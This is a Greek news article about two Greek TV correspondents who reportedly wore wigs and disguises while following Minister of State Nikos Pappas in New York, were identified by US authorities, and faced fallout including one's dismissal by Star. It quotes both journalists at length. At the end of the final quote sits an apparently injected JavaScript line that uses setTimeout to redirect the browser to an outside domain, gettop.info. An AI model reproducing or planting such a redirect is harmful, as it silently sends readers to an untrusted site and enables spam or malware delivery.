Σάλος με τους μεταμφιεσμένους δημοσιογράφους

0
8

Εντονότατες αντιδράσεις έχει προκαλέσει η αποκάλυψη ότι δυο ‘Ελληνες ανταποκρτές στη Νέα Υόρκη, ο Δημήτρης Σουλτογιάννης του Star και ο Θάνος Δημάδης του Alpha, μεταμφιέστηκαν  και προσπάθησαν να παρακολουθήσουν τον υπουργό Επικρατείας Νίκο Παππά. Οι δημοσιογράφοι φορούσαν περούκες και συνελήφθησαν από το FBI, πράκτορες του οποίου έκαναν εξακρίβωση των στοιχείων τους και στη συνέχεια τους άφησαν ελεύθερους.

Ο υπουργός Επικρατείας έκανε λόγο για αθλιότητα και υπαινίχθη ότι εκτελούσαν διατεταγμένη υπηρεσία, επειδή τα κανάλια στα οποία εργάζονταν δεν πήραν άδεια. Έκανε γνωστό, μάλιστα, ότι οι δημοσιογράφοι πλαστογράφησαν την υπογραφή μέλους του γραφείου Τύπου του Αλέξη Τσίπρα και χρέωσαν στο ονομά του μικρογεύμα αξίας 19 δολλαρίων.

Ο τηλεοπτικός σταθμός STAR απέλυσε τον Δημήτρη Σουλτογιάννη, παρότι ο ίδιος αρνήθηκε ότι φορούσε περούκα και ισχυρίστηκε ότι έκανε ρεπορτάζ φορώντας μόνο ένα καπέλο τζόκει και γυαλιά ηλίου.

Όπως ανέφερε ο σταθμός στην ανακοίνωση του και το μετέδωσε η Πόπη Τσαπανίδου στην εκπομπή της:

Διακόπτεται η συνεργασία του STAR με τον Δημήτρη Σουλτογιάννη μέχρι να διερευνηθεί πλήρως το περιστατικό με τους δύο δημοσιογράφους και τον υπουργό Επικρατείας στη Νέα Υόρκη.

soultogiannis

 

Διαβάστε τι είπε:

«Είναι τουλάχιστον αστεία τα δημοσιεύματα περί συλλήψεως μου στο Μανχάταν, απλά και μόνο επειδή έκανα αυτοβούλως το δημοσιογραφικό μου καθήκον. Στα πλαίσια της κάλυψης του ταξιδιού του Έλληνα πρωθυπουργού Αλέξη Τσίπρα στη Νέα Υόρκη, οι ανταποκριτές ενημερωθήκαμε για την -κατά δύο ημέρες νωρίτερα- άφιξη του υπουργού Eπικρατείας Νίκου Παππά.

Πράγματι βρεθήκαμε με τον συνάδελφο Θάνο Δημάδη από τον Alpha στο ξενοδοχείο που διαμένει για να πληροφορηθούμε την ατζέντα των δραστηριοτήτων του στη Νέα Υόρκη. Αυτό όπως φαίνεται ενόχλησε την προσωπική του φρουρά η οποία και κάλεσε τις μυστικές Υπηρεσίες των ΗΠΑ.

Έκαναν μια απλή εξακρίβωση στοιχείων. Φυσικά δεν υπήρξε καμία παρανομία και αφού εξακρίβωσαν ότι είμαι ένας νομοταγής Αμερικανός Πολίτης αποχώρησαν χωρίς να μας ενοχλήσουν. Δεν θα μπω στην διαδικασία να σχολιάσω τα περί μεταμφιέσεων και πλαστοπροσωπίας.

Αν ένα καπέλο τζόκεϊ και γυαλιά ηλίου θεωρούνται μεταμφίεση τότε και στις απόκριες έτσι θα κυκλοφορώ!! Είναι λυπηρό που βρέθηκαν συνάδελφοι να στείλουν τέτοια είδηση στην Ελλάδα εστιάζοντας στην δήθεν σύλληψη μου και όχι στο γεγονός ότι ο κ. Παππάς βρίσκεται εδώ και δύο ημέρες στο Μανχάταν με… »λευκή ατζέντα»… προφανώς η φωτογραφική μου μηχανή ενόχλησε περισσότερο!»

Ωστόσο, ο Θάνος Δημάδης παραδέχτηκε ότι πράγματι φορούσε περούκα, την οποία χαρακτήρισε ως αποτυχημέμη…

Διαβάστε τι είπε:

«Εδώ βλέπετε την άλλη εκδοχή μου χωρίς κουστούμι και γραβάτα εν ώρα δουλειάς! 

Η ελληνική αποστολή βρέθηκε το ΣΚ στη Νέα Υόρκη περιμένοντας τον Πρωθυπουργό. Το Σάββατο το πρωί ήταν προγραμματισμένη ενημέρωση προς τους δημοσιογράφους από τον κ. Παππά, η οποία δεν έγινε ποτέ. Δύο ολόκληρα 24ωρα με τον Υπουργό Επικρατείας στο Μαχνάταν, κι εμείς οι δημοσιογράφοι χωρίς είδηση. Η είδηση όμως βγαίνει και στο πεζοδρόμιο και δεν έχει πολιτικές αποχρώσεις γιατί η εξουσία πάντα ελέγχεται. Αυτό έχω μάθει από τα τόσα ρεπορτάζ με κάμερα στα πιο άδυτα σημεία, από τις εγκαταστάσεις των Ολυμπιακών ακινήτων μέχρι την ιστορία του Στρος Καν. 

Έτσι κι άρχισε ένα οδοιπορικό για το ποιος, που και γιατι πιο φυσιολογικό αυτό για κάθε δημοσιογράφο; Αν και τα γέλια ήταν μέχρι δακρύων κάθε φορά που κοιταζόμασταν με τις περούκες, η καταγραφή της είδησης για έναν δημοσιογράφο πολιτικού ρεπορτάζ μάλιστα είναι το παν, αν σκεφτεί κανείς ότι ένα ολόκληρο ΣΚ κυβερνητικό κλιμάκιο μετακινείται στη Νέα Υόρκη με λευκό πρόγραμμα. Για μένα το ρεπορτάζ δεν είναι να μού δώσουν γραμμένη μία είδηση ή να την αντιγράψω από κάπου. 

Το ρεπορτάζ έχει λίγες επιτυχίες και πολλές αποτυχίες… Και εχθές μάς καταλάβαν γιατί προφανώς τώρα που ξαναβλέπω τη φωτογραφία η περούκα ήταν ό,τι πιο αποτυχημένο μπορούσα να είχε επιλέξει από στυλ και χρώμα. Η διασταύρωση των στοιχείων μας έξω από το ξενοδοχείο του κ. Παππα έγινε χθες από τις αμερικανικές αρχές. Αλλά από χθες μέχρι σήμερα το ρεπορτάζ συνεχίζεται». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here